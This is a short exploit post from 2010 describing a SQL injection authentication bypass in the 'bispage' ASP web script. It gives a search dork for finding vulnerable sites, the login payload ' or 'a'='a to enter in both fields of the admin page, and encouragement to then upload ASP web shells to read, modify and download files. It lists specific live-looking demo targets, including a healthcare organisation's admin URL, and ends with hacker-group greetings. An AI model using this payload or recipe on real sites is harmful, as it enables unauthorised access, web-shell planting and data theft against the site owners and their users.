Bispage suffers from a remote SQL injection vulnerability that allows for authentication bypass.
08da5d96c93dd04f77131601237b2524d8b3b3f32a08fdbd41c48add142b62c8
# Exploit Title: [ bispage Bypass Vulnerability]
# Author: [SaMir-BonD] EGY@hotmail.com
#Organization : TEAM-DZ
#Formal sites : t00ls.org - h4kz.com
# Software Link: [N/A]
# Script's Language: [.ASP]
# Tested on: [Windows PHP/4.3.11 os]
#Dork :"Developed by Bispage.com"
# CVE : [if exists]
# Code : [exploit code]
#Site page : bispage.com >> Infected :D
# Date: [23-2-2010]
*Hey dudes how are you doin' :D
*it's an easy bypass Vuln just see those steps :
________________________________________________
1) Victim.com/script/admin
2) User Between Brackets : (' or 'a'='a)
Pass Between Brackets : (' or 'a'='a)
3) Enjoy Uploading Shells :D ( upload ASP shell types to be able to read/modify/download Files)
4)Demo : https://www.bethesdahealthcare.net/bethesdahealthcare/admin/
https://Bispage.com/admin
*If you hacked DEmo you will be balls :D
#Greetz to:
-----------
[TEAM-DZ: maxi32-noureddin-Skins-TheMoorish-Dr.Genius-IslamLee-M4st3r]
HcJ-Mr.Mero-Laqi@hajdin-Sh3ko-EGY-MaF!4-Trackoda-Dr.Mozo-TNT_HACKER-Elkatrez-DataFr4ck3r
& all those who know Samir-BonD(oXide)
---> h4kz.com & t00ls.org
Note : La Elah Ella ALLAH .. Muhammad Rasool ALLAH..
________________________________
Hotmail: Free, trusted and rich email service. Get it now.<https://clk.atdmt.com/GBL/go/201469228/direct/01/>